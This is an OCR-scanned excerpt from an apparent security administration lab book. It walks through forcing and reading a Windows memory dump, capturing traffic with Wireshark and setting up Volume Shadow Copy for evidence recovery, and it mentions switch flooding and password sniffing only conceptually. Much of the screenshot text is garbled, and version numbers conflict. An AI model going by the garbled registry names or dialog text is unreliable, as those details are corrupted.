Settings

i~ User Profiles

Desklop settings related to vour logon

Settings

r~ Startup and Recover

System startup, system failure, and debugging information

Settings

Environment Yariables | Error Reporting |

ak. I Cancel | Apply |

4. In the Startup And Recovery section, click the Settings button.

Startup and Recovery ﬂll

[~ Syskem skartup

Deefault operating system:

[V Time to display list of operating systems: I 5 Hﬁ seconds
¥ Time to display recovery options when nesded: IED 3: seconds

To edit the startup options file manually, click Edit. Edit

[ Syskem Failure

[¥ Write an event ko the system log
¥ Send an administrative slert
v Automatically restart

Wirite debugging information

ISmaII memory durmp (64 KB) d

Srnall dump directory:
%Sy stemRoot s\ Minidump

¥ Overwrite any existing File

coca_|
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In the System Failure section, observe that the three check boxes are enabled. If you
needed to, you could disable any one of these three configuration parameters. Clearing
the Automatically Restart check box leaves the blue screen on the display until a
manual power-down is initiated. However, system functions and processes have been
halted at that point.

Clear the Automatically Restart check box. For this exercise, you’ll want to view the
information from the blue screen on the video display. In practice, you may choose to
perform the reboot.

In the subsection Write Debugging Information, select the drop-down list to view the
three choices:

Small Memory Dump (64 KB) This is called the minidump.

Kernel Memory Dump This represents the larger amount of content, with no user
data, and only includes memory contents related to the OS.

Complete Memory Dump This represents the largest amount of information,
historically too much to send via the Internet, but that has pretty well been eliminated
as a concern due to improved Internet bandwidth connectivity.

Alternately select the three different dump types and observe the dialog box. Select the
Small Memory Dump (64 KB) for this exercise.

In the Small Dump Directory field, notice the location where the dump file will be
written. %SystemRoot% means the Windows directory (or whatever else you may have
called it during installation of the system). \Minidump indicates that, upon triggering,
the system will build a folder if it doesn’t already exist and store the minidump files in
it. You could relocate this to any local, writable disk in case this drive is too full, or if
you are fighting a hardware/driver issue that is supporting the spindle holding the boot
partition. Leave this at its default setting of %SystemRoot%\Minidump.

Startup and Recovery 21x

[~ Syskem skartup

Default operating system:

I”Mi[rnsnft ‘Windows ®P Professional” [fastdetect II'NDEXE[LItE=Optd

¥ Time to display list of operating systems: I 5 Hﬁ seconds
¥ Time to display recovery options when needed: ISD Hﬁ seconds

To edit the startup options file manually, click Edit. Edit

[ Syskem Failure

[¥ rite an event ko the system log
¥ Send an administrative slert

™ Automatically restart

\Write debugaging information

Small dump direckory:
%oSystemRoot¥e\Minidump

¥ | Gverwrite any existing Filz

cncel_|
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10. Click OK to close the Startup And Recovery dialog box.
11. Click OK to close the System Properties dialog box.

Implementing the Registry Edit (the “Reg Hack”)

1. Still logged on to the Windows XP Professional system as the Administrator, select
Start » Run. In the Open field, type regedit and click OK to launch the Registry
editing tool.

2. In the Registry Editor, in the left pane, expand the folders to the following location:
HKEY_LOCAL_MACHINE » System » CurrentControlSet » Services » i8042prt.
Select the Parameters folder.

L Editing the Registry is a potentially dangerous action. You should always
ING manually trigger a system restore point and perform a backup of all data

on the system. Follow the instructions precisely. Double-check (and then
triple-check) your entries. Treat all entries as if they are case sensitive.

In the right pane, right-click the white space and select New » DWORD Value.
Name the new DWORD value CrashOnCtriScrol1 and press Enter.
Right-click on the new CrashOnCtrlScroll DWORD value and select Modify.

In the Edit DWORD Value dialog box, first select Decimal in the Base section, and
then in the Value Data field, type the number 1.

© g > w

Walue name:
IErashD rCtrdSeoll

WYalue data Base——————
1 " Hexadecimal
' Decimal

Cancel |

7. Click OK to close the Edit DWORD Value dialog box.
8. Confirm your settings carefully. Close the Registry Editor application.

If you wish to disable the system from being able to perform the manually
A TE triggered memory dump, all you have to do is delete the DWORD Value

CrashOnCtri1Scrol1 from the Registry, and restart the system.

9. Close all applications and restart the system.
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Triggering the Memory Dump
1. Log on to the Windows XP Professional system as the Administrator.
2. Launch Notepad, Calculator, and Paint, and minimize all three.

3. Press and hold the Ctrl key and press the Scroll Lock button twice. You should get a
blue screen.

la problem has been detected and windows has been shut down to prevent damage
[0 your computer.

The end-user manually generated the crashdump.

If this is the first time you've seen this stop error screan,
restart your computer. If this screen appears again, follow
rthesa steps:

Check to make sure any new hardware or software is properly installed.
If this is a new installation, ask your hardware or software manufacturer
for any windows updates you might need.

If problems continue, disable or remove any newly installed hardware
or software. Disahle BIOS memory options such as caching or shadowing.
If you need to use Safe Mode to remove or disahle components, restart
our computer, press F8 to select advanced startup options, and then
select Safe Mode.

Technical information:

ek STOR:D 0xQ00000EZ (0x00000000, 0x00000000, 0x00000000, 0x00000000)
Beginning dump of physical memory

Physical memory dump complete.

Contact your system administrator or technical support group for further
assistance.

4. Review the blue-screen message.

5. Power down the system.

Reviewing the Memory Dump

1. Power up the system and log on to the Windows XP Professional system as the
Administrator.

2. As the desktop stabilizes, you should receive a Microsoft Windows error message.
Review the message.

Microsoft Windows

The system has recovered from a serious error.

A log of this errar has been created

Please tell Microzoft about this problem.

‘wie have created an emar report that you can zend ta help us imprave
Micrazoft Windows. \We will lreat this report as confidential and
anonymoLs.

To see what data this eror report containg, click here,

Send Emor Report | Don't Send |

3. Click on the Click Here link to review the data the error report contains related to
the blue screen. Review the Error signature and recognize information regarding the



474

Phase 9 = Investigating Incidents

operating system version, OSVer; the service pack level, SP; and the Microsoft product
ID, Product.

Microsoft Windows

Errar signature

BCCode: &2 BCP1: 00000000 BCPZ2: 00000000 BCP3: 00000000
BCP4: 00000000 OSVer: 6 1_2600 SP:1.0 Product: 266_1

Reporting details
This eror report includes: information regarding the condition of Miciosoft Windows when the problem
accured, the operating spstem version and computer hardware in use, and the Intemet Protocal (IP)
address of your computer.

“whe do not intentionally collect your name, address, email addrees or any ather form of personally
identifiable information. However, the enor report may contain customer-specific information in the
collected data files. While this infarmation could patentially be used to determing your identity, if present,
it will not be used

The data that we collect will only be used to fix the problem. If more information is available, we will tell
you when pou repoit the problem. Thiz emor report will be sent using & secure connection to a database
with limited access and will not be used far marketing purposes.

To view technical information about the emor report, Sick Fere!

To see our data collection policy on the web, click here. Clase

4. Select the Click Here link to view technical information about the error report.

Error Report Contents

The following files will be included in this emror repart:

C: 4 M DO S SMinidump'binil 01 006-04.dmp
C:ADOCUME~18ADMIMI~TALOCALS ~ 15T empiWE R tmp. dirD0% sysdata. xml

Close

5. Notice that Microsoft wants two files:

The memory dump named Mini101006-04.dmp (the numbers represent a date code,
followed by a sequential number)

sysdata.xml, which is a file that logs system details and all hardware devices and
drivers that were loaded at the time of the system crash

You might want to locate and copy this file to the desktop for later review.

TE It contains an excellent summary of details. Notice the path to the file in
the dialog box. The parent folder name will begin with WER (Windows
Error Report), but the number(s) behind it will vary. The extension should
be .dir00.

6. Click Close to exit the Error Report Contents dialog box. Click Close to exit the
Error Signature dialog box. Click the Don’t Send button to close the Windows Error
Reporting dialog box without sending crash information to Microsoft. You—not a real
application or operating system problem—triggered the crash.
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Launch Windows Explorer. In the left pane, expand the folders as necessary to locate
the WINDOWS\Minidump folder.

If there is more than one file in the Minidump folder, locate the file with today’s date
and the timestamp that matched the triggered blue screen.

Right-click on the correct Minidump file and select Open.
Enable the Select The Program From A List option and click OK.
In the Programs list, select Notepad and click OK.

Openwith 21|
j Choose the program you want to use ko open this file:

File:  Minil01006-01. dmp

[~ Programs

@ Microsoft Office Pickure Manager =
@ Microsoft Office PowerPoint

@ Microsoft OFfice Visio

@ Microsoft OFfice \Word

£} ctepad J
W pairt

% Paint Shop Pro 8

aﬁ PawerDVD

) OuickTime Plaver |

Type a description that you want to use For this kind of file:

[V Always use the selected program to open this kind of file
Browse, ., |

If the program you want is not in the lisk or on your computer, you can look

for the appropriate program on the Web,
col_|

Adjust the window size of Notepad as desired. Select Format » Word Wrap.

Scroll through the memory dump. Notice the reference to PageDump. The memory
dump gets written first to the pagefile, and then on reboot it gets written to the
minidump file, Mini101006-04.dmp in this case.

Notice the reference to SYS, DLL, and possibly some EXE files. You may also see some
BIOS and hardware device information.

Scroll to the top of the file and click in the very first space. From the menu, select
Edit > Find. Type KDBG in the Find What field, and then click Find Next. KDBG

refers to the Kernel Debugger, a tool used to diagnose kernel-related processes.

Scroll back to the top of the file and click in the very first space. From the menu, select
Edit » Find. Type TRGD in the Find What field, and then click Find Next. TRGD
refers to the Triage Data (it may also be referred to as Triggered Data). Triage implies
sorting, based on an evaluation and categorization into three levels of severity to be
able to address the most critical issues first. This TRGD tag indicates the end of the
memory dump, but the file may continue with additional system-related information.
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17. Your conclusion regarding the memory dump is probably that it is cryptic and largely
unreadable. If you did have to extract information from this file, you would solicit
the services of a worthy forensic investigator or contact Microsoft for additional
analytical assistance. The good news is that you now know how to create the file for
further analysis.

18. Close Notepad.

Criteria for Completion

You have completed this task when you have configured the system to be able to force a
memory dump, and then performed and reviewed the memory dump.

Task 9.4: Capturing Packets with the
Packet Analyzer: Wireshark

Wireshark is a free, commonly used packet analyzer. Packet analyzers—also called
network analyzers, protocol analyzers, or sniffers—monitor the network and record the
packets (frames, actually) on the network that it is connected to. Packet analyzers are
useful for analyzing traffic patterns, identifying rogue protocols and nodes on the network,
and troubleshooting many types of network- or protocol-related problems.

A rogue protocol is a protocol that should not be present on your network.
TE If your network only uses TCP/IP for a transport protocol, there should be

no TP4 or IPX/SPX frames on the network. We are using the word node to

represent a system or device that communicates on the network.

In the early days of networking, a network interface card (NIC) in a computer (node) could
accept all frames that existed on the segment that the NIC was attached to. This is called
promiscuous mode. Over time, it became recognized that accepting all those frames wasn’t
necessary, and it introduced two specific concerns:

= Since the NIC accepted every frame, even those that were not destined for the node, it
made it easier for malware to infect the node.

= Bad guys could capture all frames, including conversations between others that did not
include the bad guy, and access the information in those frames. This is a compromise
of confidentiality on the network.

In later days of networking, to secure the network further, standards for NIC drivers
required that the NIC may only accept the following:

= Frames sent from the computer

= Unicast frames sent to the computer that specify the node’s unique address
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= Broadcast frames that are destined for all nodes
= Multicast frames that the node has registered to receive

With the new NIC driver, a node may not accept frames that were not intended for the
node. In other words, the node could not eavesdrop on network conversations that it was
not participating in. This is called nonpromiscuous mode. By default, today all NICs
operate in nonpromiscuous mode. When you launch a sniffer, the specialized network
analysis tool, on your computer, it changes the mode of the NIC from nonpromiscuous
mode to promiscuous mode so it can accept and capture all frames that are transmitted on
the segment.

To get a clear picture of sniffers, in addition to understanding the difference between
nonpromiscuous mode and promiscuous mode, we must examine hubs and switches. In
the past, networks all ran on hubs. The ports on hubs share a common backplane. In other
words, each node could see all the traffic that existed on the hub, and even on multiple,
daisy-chained hubs, up until the segment connected to a bridge or router. Bridges and
routers perform filtering functions. Hubs do not filter. Using a sniffer (placing the NIC into
promiscuous mode), you could monitor (eavesdrop on) network conversations between two
nodes that did not include your node. Again, this is useful for analytical purposes, but it
can also be dangerous, since the system running the sniffer is more likely to get infected
with all sorts of malware, and if the sniffer is in the hands of an attacker, they may be
accessing data they are not authorized to see—a compromise of the confidentiality of your
information assets. With a NIC in promiscuous mode, and with the NIC attached to a hub,
you could see all traffic on a segment.

There is a problem with sniffers these days, since most networks have replaced their
hubs with switches. Switches are essentially multiport bridges that isolate each node from
all other nodes, unless there is specific traffic (frames) destined for the node. Your sniffer
can only see and record (capture) traffic destined for your node. The filtering that switches
perform occurs because the switch learns your Media Access Control (MAC) address,
and then makes forwarding decisions based on a frame’s destination MAC address. If the
destination MAC address of a frame matches that on your NIC, the switch will forward
the frame to your NIC. If the destination MAC address of a frame doesn’t match that on
your NIC, the switch will not forward the frame to your NIC. Even though the sniffer
places the NIC in promiscuous mode, the sniffer will never see any traffic except what the
switch forwards to it. For your sniffer to see all traffic, the real picture of your networking
protocols, you must attach the sniffer to a point in the network where traffic to your NIC
is not being filtered by a switch. You must understand where you have connected into the
network with your sniffer, and consider what types of traffic you should expect to see at
that point (filtered or unfiltered).

For administrative purposes, many of the industrial-class switches can implement
promiscuous mode, in which all frames get forwarded to all nodes. This is typically
accomplished through a diagnostic (or spanning) port on the switch that connects directly
to the backplane, or a diagnostic mode that can be toggled on or off for a specified port by
a system administrator.
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Attackers can also cause this to happen. One approach is to flood the switch with
so many frames that, instead of dropping frames, the switch connects all ports to the
backplane, stops filtering, and acts as a hub. It’s faster and easier to not think about each
frame and just send each frame to all ports. Another way that attackers cause the switch
to forward all frames to their NIC is to report to the switch that your node is every node,
every MAC address. You're telling the switch to “Send me every frame.” A good switch will
detect this attack and not permit it to take place.

Scenario

You have recently become responsible for several segments on your corporate network. You
want to understand more about the nature about the traffic on these segments. You are
looking for traffic flow patterns, and you always have your eye open for rogue nodes and
protocols on the network.

Scope of Task

Duration
This task should take 45 minutes.

Setup

You will need to download Wireshark. As of this writing, the latest version of Wireshark
is v1.4.3. Wireshark was previously called Ethereal. Ethereal was first written for the
Unix/Linux family of operating systems. Because of this, it is open source licensing and
free for you to use. Ethereal and Wireshark have been ported over to run on the Microsoft
platform.

Caveat

Downloading and installing software from the Internet is always risky. Be sure your system
is fully patched, and that you are running recently updated antivirus and antispyware
applications. Scan these downloaded files before you install them. Scan your system after
installing them and before using them.

Procedure

You will first download and install Wireshark. You will then initiate a scan and surf the
Internet for a while. Then you will stop and save your capture. You will then review
the scan.
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Equipment Used

For this task, you must have:

Windows Vista system
Administrator access

Internet access

Details
Downloading Wireshark

1.
2.

Log on to the Windows Vista system as the Administrator.

To download Wireshark v1.4.4, launch Internet Explorer and browse to www
.wireshark.org/downToad.html.

Select to download the appropriate version of the sniffer (32-bit or 64-bit based on your
operating system).

On the File Download — Security Warning screen, select to save the file. Save the file to
your desktop using the default name, such as wireshark-win64-1.4.3.exe.

File Download - Security Warning ﬂ

Do you want to run or save this file?

@ Name: wireshark-setup-1.0.2.exe
Type: Application, 21.1MB
' From: internap.dl.sourceforge.net '

Run | [ Save ][ Cancel |

potentially ham your computer. I you do not trust the source, do not
run or save this software. What s the risk?

@ While files from the Intemet can be useful, this file type can

Installing Wireshark

1.

Upon completion of the file download, double-click the executable, which should be
located on your desktop.

In the Open File — Security Warning dialog box, click Run to execute the installation
application for Wireshark.

Note that the installation application confirms that the package has not been
corrupted.

On the Wireshark Setup Wizard’s Welcome screen, click Next.
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[l Wireshark 1.0.2 Setup

[=[=] = ]

Welcome to the Wireshark 1.0.2
Setup Wizard

This wizard will guide you through the installation of
Wireshark.

Before starting the installation, make sure Wireshark is not
running.

Click Mext' to continue.

On the License Agreement screen, click I Agree.

On the Choose Components screen, leave the defaults and click Next.

GTK2 is the newest interface for Wireshark. Loading or removing
additional components is optional, but may alter the application’s
user interfaces or performance or cause other potentially undesirable

TE

manifestations.

[l Wireshark 1.0.2 Setup

[=[=] = ]

Choose Components

Choose which features of Wireshark 1.0.2 you want to install.

Select the type of install:

Or, select the optional
components you wish to
install:

Space reguired: 83.8MB

Mullsaft Install System w2, 35

The following components are available for installation.

Wireshark (GTK2 user interface) -

Wireshark
TShark

Rawshark

Plugins / Extensions
Tools

: User's Guide

Description

Position your mouse over a component ko see its
description,

[ < Back ” Next = ][ Cancel

]

On the Additional Tasks screen, leave the defaults and click Next.
On the Choose Installation Location screen, leave the default and click Next.

On the Install WinPcap? screen, leave the defaults and click Next.




L NPF refers to the Netgroup Packet Filter—npf.sys—a system
ING driver that is essential for the operation of Wireshark. If you start NPF

at startup, nonadministrator users can use Wireshark to capture

10.
1.

12.
13.
14.
15.
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packets. This could be a bad thing. If nonadministrator users can capture

frames on a network, they could be gaining unauthorized access to
sensitive information. We trust that administrators adhere to a higher
standard of ethics and would not exceed their intended level of privilege

and access.

Feel free to click the What Is WinPcap? button. This opens a browser on an

% informational web page regarding WinPcap.

[ Wireshark 1.0.2 Setup

=

=]

2 N

Install WinPcap?
WinPcap is required to capture live network data. Should WinPcap be installed?

Currently installed WinPcap version
WinPcap 4.0.2

Install
[[] install WinPcap 4.0.2
If selected, the currently installed WinPcap 4.0.2 will be uninstalled first.

Services
[¥] start WinPcap service NPF" at startup
(s0 users without Administrator privileges can capture)

Nullsoft Install S

7 T

[ <Bak | sl | [ comcel

An installation screen is presented.

About halfway through the installation, WinPcap installation is triggered. Click Next

to proceed.

On the License Agreement screen, click I Agree.

A progress screen is displayed. Upon completion, click Finish.

The Wireshark installation now continues. Upon completion, click Next.

On the Completing screen, enable the Run Wireshark 1.4.3 check box and

click Finish.
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[l Wireshark 1.0.2 Setup [=[E] =/ ]

Completing the Wireshark 1.0.2
Setup Wizard

Wireshark 1.0.2 has been installed on your computer.

Click Finish to dose this wizard.

Run Wireshark 1.0.2

[ show News

< Back Cancel

Using Wireshark to Perform a Network Capture

1. When Wireshark launches, you must specify which network interface, or network
adapter, you wish to have Wireshark monitor to perform the capture. Select Capture >

Interfaces.
u w ¥ shark Network H—_ S—(
i e G Anghre e
e e w L 3 ame
” - ot b -K
o | & St - Express ¢ p
-
-
a .

2. In the Capture Interfaces dialog box, identify each adapter. On the adapter that you
are using to connect to the Internet, click the Options button to the right.

y If you are not sure which adapter to select, click the Details button adjacent
A TE to each adapter to try to identify the correct adapter.
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[l Wireshark: Capture Interfaces @MJ
Description P Packets Packets/s Stop -
@ Microsoft 0000 0 0
@ MS Tunnel Interface Driver unknown 0 Q
i@ Realtek RTL8168B/81118 PCI-E Gigabit Ethernet NIC 172.28.17246 40 0 =
d. VMuware Virtual Ethernet Adapter 192.168.01 8 a
@ VMware Virtual Ethernet Adapter 192168.2371 & Q

You are presented with the Capture Options dialog box. This dialog box is a busy one;
spend some time reviewing its options:

You can limit the capture file size with buffer size.
You can turn off promiscuous mode of operation.

You can discard the trailing end of the frame by limiting the packet size. This gets
more frames in the buffer limit but loses payloads.

You can implement a prebuilt filter. Filters are used to capture only certain types
of traffic, like a specific protocol, or traffic to a specific IP or MAC address, etc.,
rather than all traffic.

You can configure the display during an active capture. This may consume some
resources and cause the capture to miss some frames.

You can implement automatic name resolution to more easily identify who is
sending frames to whom.

You can preprogram the end of the capture by number of packets, by file size, or
by time.

[l Wireshark: Capture Options =[E] =]
Captur
Interface: | Realtek RTLE168B/81118 PCI-E Gigabit Ethernet NIC: \Device\NPF_{4AASE3AS-6DBE-4FAD-0381-8607ISEALD66] =)
1P address: 1722817246
Link-layer header type: ‘ Ethernet E‘ Buffer size: 1 [ megabyters) [wireless Settings

[¥] Capture packets in promiscuous mode

Limit each packetto 63 |- bytes

[ apture Filter,| | [=)
Capture Fil Display Options
i ‘ | [E""‘se"‘] Update list of packets in real time
Use multiple files
[ Nextfile every 1 = megabyte(s) i Automatic scrolling in live capture
[ Next file every 1 minute(s) - el
[7] Ring buffer with B = files
B Name Resolution
[] Stop capture after il = file(s)
Stop Captire - Enable MAC name resolution
it 2 El[packety Enable petwork name resolution
e 1 = | megabyte(s) -
|1 ‘: minute(s) = Enable transport name resolution
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Once you’ve reviewed this dialog box, click Start to begin the capture.

You will be presented with an active Capture dialog box indicating that you are
currently recording frames on the selected network interface.

Realtek RTL8168B/8111B PCI-E Gigabit Ethernet NIC: Capturing - Wireshark

[=[E] = ]

File Edit View Go Capture Analyze Statistics Help
BEged sl asrseTLIERE Qe @BM%|
E\Iter:l ~ Expression.. Clear Apply
No. . Time Source Destination Protocol Info
T T
18 7.811233 172.28.172.46 192.168.222.225 ICMP Echo (ping) request
20 9.386596 172.28.172.46 192.168,222.225 ICMP echo (ping) request
21 9.999453 Cisco_c6:bc:iBa Cisco_c6:bc:Ba LOOP Reply
22 11.446132 172.28.172.46 192.168.222.225 ICMP Echo (ping) request
23 12.540767 64.233.167.147 172.28.172.46 TCP http > tsh2 [FIN, ack]
25 13. 504550 172.28.172.46 192.168.222.225 ICMP Echo (ping) request B

+

[

00 1c f9 c6 bc Ba 00 1c
01 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00

Frame 1 (60 bytes on wire, 60 bytes captured)
ethernet II, src: Cisco_c6:bc:8a (00:1c:f9:c6:bc:8a), Dst: Cisco_c6:bc:8a (00:1c:f9:c6:bc:8a)
configuration Test Protocol (loopback)
pata (40 bytes)

f9 c6 bc 8a 90 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00

| Realtek RTL8168B/8111B PCI-E Gigabit Ether.

| Packets: 26 Displayed: 26 Marked: 0

| Profile: Default

To generate network traffic, launch Internet Explorer and go to www.google.com. Type
Wireshark in the search box and click Google Search.

From the hits list, select the hyperlink for waw.Wireshark.org. Browse around on the
Wireshark website.

In the address bar of Internet Explorer, type www.sybex.com and press Enter.

Browse the Internet for a minute or two.

Click the toolbar icon with the red X on it, located directly under the View menu item,
to end the capture.

Review the frames that Wireshark captured during the exercise.

If you followed the steps properly, your capture should resemble the one

TE

in the graphic, but with the exception that your home page in Internet

Explorer may be configured to something other than Google, as ours is.
If you scroll down your capture you should see a Protocol / DNS, Info /
Standard query for an A record for www.google.com (like frame 7 in the
following graphic). Begin your review there.


http://www.sybex.com
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[ (Untitied) - Wireshark [=@] = ]
File Edit View Go Capture Analyze Statistics Help

Bwaee DXL aesoTFi ([EFaaD @B i G

Ei\ter:l v Expression.. Clear Apply

No. . Time Source Destination Protocol Info

7 3.142721 172.28.172. 46 12.127.16.67
8 3.195101 12.127.16.67 172.28.172.46

10 3.243316 64.233.167.147 172.28.172.46

13 3.290322 64.233.167.147 172.28.172.46 http > www-dev [ACK] Seq=1 Ack=544 win=6848 Len=0
14 3.313502 64.233.167.147 172.28.172.46 TCP [TcP segment of a reassembled PDU]
15 3.318292 64.233.167.147 172.28.172.46 TCP [TcP segment of a reassembled pDU] -

O i ] '

Frame 7 (74 bytes on wire, 74 bytes captured)

Ethernet II, Src: qQuantaCo_48:82:cd (00:1e:68:48:82:cd), Dst: Nomadix_01:9d:a9 (00:50:e8:01:9d:a9)
Internet Protocol, src: 172.28.172.46 (172.28.172.46), Dst: 12.127.16.67 (12.127.16.67)

Domain Name System (query)

0000 00 50 e8 O1 9d a9 00 le &8 48 82 cd 08 00 45 00
0010 00 3c 47 e9 00 00 80 11 00 00 ac 1c ac 2e Oc 7f
0020 10 43 cd 64 00 35 00 28 75 46 e4 af 01 00 00 O1
0030 00 00 00 00 00 00 03 77 77 77 06 67 6f 6f 67 6C
0040 &5 03 63 6f 6d 00 00 01 00 01

+ [ »

| File: "C:\Users\TopDogh\AppData\LocalTem... | Packets: 326 Displayed: 326 Marked: 0 Dropped: 0 [ Profile: Default

You can find a tremendous amount of information and learn a lot by carefully studying
captures, even as innocuous as this one. You are looking at the true mechanics of the
network and protocols, the nuts and bolts. You can verify details that you have been
told about how protocols work.

In the preceding graphic, notice the Source IP address in frame 7. This is the IP
address of the local computer. The Destination IP address is that of the configured
DNS server for the local computer.

Now look at frame 8. This is the DNS response providing the IP address of the web
server www.google.com.

Notice frames 9, 10, and 11. These frames are the three-way TCP handshake to
establish a TCP session with the Google web server:

s Frame 9 - SYN

s Frame 10 - SYN/ACK

= Frame 11 - ACK

Frame 12 is the HTTP GET frame where the local computer is requesting the web
page from www.google. com.

The next few frames contain the content from the website that will populate your
browser with the Google web page.

Now find this similar sequence in your capture.

Take a closer look at frames 7 and 8 in the previous graphic: the DNS query for www
.google.com.

Explore the details of frame 7 by clicking on it in the top pane and expanding the
lines in the center section of the display.
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Frame 7 (74 bytes on wire, 74 bytes captured)

Ethernet II, Src: Quantaco_48:82:cd (00:1e:68:48:82:cd), Dst: Nomadix_01:9d:a% (00:50:e8:01:9d:a9)
Internet Protocol, src: 172.28.172.46 (172.28.172.46), Dst: 12.127.16.67 (12.127.16.67)

pomain Name System (query)

Notice that the DNS query (frame 7) uses User Datagram Protocol (UDP) to the DNS
server’s destination port (Dst port) 53.

In the next frame (frame 8, or one of the following frames in your capture), notice
that the DNS server replies using UDP from the DNS server’s source port of 53 to the
randomly selected port number 52580 on the local client.

Now find this similar sequence in your capture.

section of the selected frame. This is where attackers find valuable
information, such as unencrypted passwords when users log on with
applications like FTP and Telnet.

% The bottom section of Wireshark displays the contents of the highlighted
A TE

4. The more you look at captures, the more you will see. Ten seconds of captured data
can become hours of incredibly worthy study time. Expand one of the frames of
interest to expose all lines of data and review each section.

You may want to review the basics of TCP/IP online. A good starting point
TE for this review is www.w3schools.com/tcpip/default.asp.
5. When you have finished reviewing the capture, close Wireshark.

Criteria for Completion

You have completed this task when you have downloaded and installed Wireshark, the
protocol analyzer, performed a capture, and reviewed the capture data.

Task 9.5: Recovering Previous
Versions of Files

Very often, when a system has been compromised, or when you find unacceptable use of a
system, the attacker attempts to cover their tracks by deleting the incriminating evidence,
either content within a file or the file itself. It is possible to recover this deleted content
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using a tool that was introduced with Windows Server 2003 and XP. It is called Volume
Shadow Copy (the backup portion) and Previous Versions (the recovery portion).

Volume Shadow Copy (VSC) is available only on Server 2008, Server 2008 R2, and
Server 2003. Server 2008 servers, R2 servers, Server 2003 servers, and all Microsoft
clients (including NT 4, 9x, ME, Windows 2000, XP, Windows Vista, and Windows 7)
can recover previous versions of the files from servers. By default, at scheduled times each
day, the server takes a VSC snapshot of all content on the partition configured with VSC
enabled. It records the changes to each file since the last VSC. This does, of course, occupy
hard drive space—300 MB minimum—and can occupy as much hard drive space as you
allow it to use. Server 2003 has the Shadow Copy Client (also called Previous Versions
Client or Time Warp Client) already installed and available.

After you install the Shadow Copy Client software, any Microsoft client can review up
to 64 previous versions to recover any copy the server has available. The add-on Shadow
Copy Client software can be downloaded from http://technet.microsoft.com/en-us/
windowsserver/bb405951.aspx.

This recovery can be used by clients to recover modified or deleted files, and can be
used by administrators to recover evidence that has been deleted in an attempt to cover the
tracks of an attacker. This should not be used for disaster recovery, even though it may help
in some disaster recovery situations. Since the shadow copy often resides on the same disk
as the content, if the disk fails both copies will be lost.

Scenario

You are the administrator of a Microsoft network. You need to configure your environment
to be able to recover deleted content and files for investigative purposes as part of your
CERT program.

Scope of Task

Duration
This task should take 45 minutes.

Setup

You will first configure VSC on a Server 2003 system. You will then manipulate files on
a share point to create multiple previous versions. Then you will download and install
the Shadow Copy Client on an XP system and perform selected content and file recovery
procedures to confirm the validity of the shadow copies.

Caveat

Allowing clients to utilize the Shadow Copy Client is definitely a double-edged sword, at
best. While it may allow a client to recover their own deleted content, if they recover the
content incorrectly, they can easily overwrite the most recent copy of the content, resulting
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in lost data. Any time this type of error occurs, somehow the blame falls squarely on the
shoulders of the administrator; it’s going to be your fault that the client lost their new data.

If you’re diligently backing up content, you may be able to recover their lost data, or you
may even be able to pick their new data out of the Previous Versions Client. But frankly,
don’t you have better things to do? In a real corporate environment, you might want to
keep the recovery capability in the hands of the administrators, and not install or train the
client on previous versions.

Procedure

First you will configure and enable the VSC feature on a Server 2003 system. Next you
will create and manipulate content by adding and deleting content and files to create
differing previous versions.

You will then download and install the Shadow Copy Client on an XP system. Once
that is accomplished, you will perform multiple recovery procedures to validate the
recovery processes for future use.

Equipment Used

For this task, you must have:

= Windows Server 2003 system (or a Windows Server 2008 system)

= Windows XP Professional system (or a Windows Vista or Windows 7 system)
= Administrator access

= Internet access

Details
Configuring and Enabling the Volume Shadow Copy Feature on Server 2003
1. Log on to the Windows Server 2003 system as the Administrator.

2. Launch Windows Explorer. In the left pane, expand the view sufficiently to select the
root of the C:\ drive.

3. In Explorer, in the left pane, select the root of the C:\ drive. In the right pane, right-
click on white space and select New » Folder. Name the folder STUFF.

4. Share the folder with default permissions.

)/ Review Task 4.8 for instructions on sharing folders, if necessary.
e

5. In Explorer, in the left pane, right-click on the root of the C:\ drive and select
Properties.
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% C:', - Microsoft Internet Explorer

Fle Edt View Favorites Took Help

Qbak - O - (T ‘ ) Search ‘E Folders | &
Address Iw [}

Folders

@ Desktop

D MMy Documents

B i RIO  MOBEER.COM
5 54 Floppy (A1)

Collapse
i
B (3 cdcons ——
() Docs
[C3) Dacuments BT 1
© search...

[ R
(L) Program File  Sharing and Security...

[[3) RECYCLER. &3 WinZip b
() SOURCE —

(& STUFF s

() System Yolu  Copy X
() WINDOWS — Paste
(5 wmpub O
& wsls Rename H

| ik VD Drive (D:f Properties
4

|27 objects (Disk free space: 6,34 GB)

In the Properties dialog box for the C:\ drive, select the Shadow Copies tab.

This option is only available by default on Server 2003. On Server 2008 R2,
TE the right-click menu shows Configure Shadow Copies.

Notice that Shadow Copies is not enabled by default. This feature consumes system
resources that you may not want to commit. For this task, accept the performance
degradation. Click Settings.

SYS_BOOT (C:) Properties i
General I Toolz | Hardwsare | Sharing |
Security Shadow Copies I Quota

Shadow copies allow users to view the contents of shared folders
as the contents existed at previous points in time. For information on
required client software, click here.

Select a wolume:

“olumne: Mewt Bun Time | Shares Used

ed

Enable Digable | Seflings... |

i~ Shadow copies of selected volume

Lreate Now |
Delete How |
Hevert.. |

Ok I Cancel Apply
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ﬁl‘ If you click Enable first, and later wish to change where you want to store
ING the shadow copies, all existing shadow copies will be deleted for this
volume (partition). Always configure your settings first.
8. In the Settings dialog box, you can move the shadow copy content to a different
volume, configure a space limit for the shadow copy content, and adjust the automatic
shadow copy schedule for this volume. Click the Schedule button.

Settings
Wolume:
=

[ Storage area
Located on this volume:

Jen =l Dietails...

Mawimum size: " Mo limit
1 Use fimit 1946 _,:i' ME

MNote: Vou need at least 300MB free space to create a shadow copy.

7~ Schedule

Schedule...

MNote: The default schedule creates bwo shadow copies per day. Avaid
creating shadow copies more frequently than ance per haur,

0K I Cancel |

9. By default, once enabled, the VSC automatically creates copies at 7 a.m. and 12 p.m.,
Monday through Friday. Select the drop-down list in the top field to view the default
schedule.

10. To add one more copy event each day, click the New button in the Schedule dialog box.

11. In the Schedule dialog box, select Weekly from the Schedule Task drop-down list.
Adjust the Start Time field to 3 p.m. Configure the Schedule Task Weekly to every
week on Monday, Tuesday, Wednesday, Thursday, and Friday.

12. Once you have the proper configuration, select the drop-down list in the top field to view
the newly modified schedule of 7 a.m., 12 p.m., and 3 p.m. Monday through Friday.

L= 7]
Schedule I

3. Ak 300 PM every Mon, Tue, \Wed, Thu, Fii of every week, starting 1[j

1. 40700 AM every Mon, Tue, Wed, Thu, Fri of every week, starting 1011
ed, Thu, Fri of every wesk, starting 10/
Thu, Fri of ing 10471H

13. Click OK to close the Schedule dialog box.

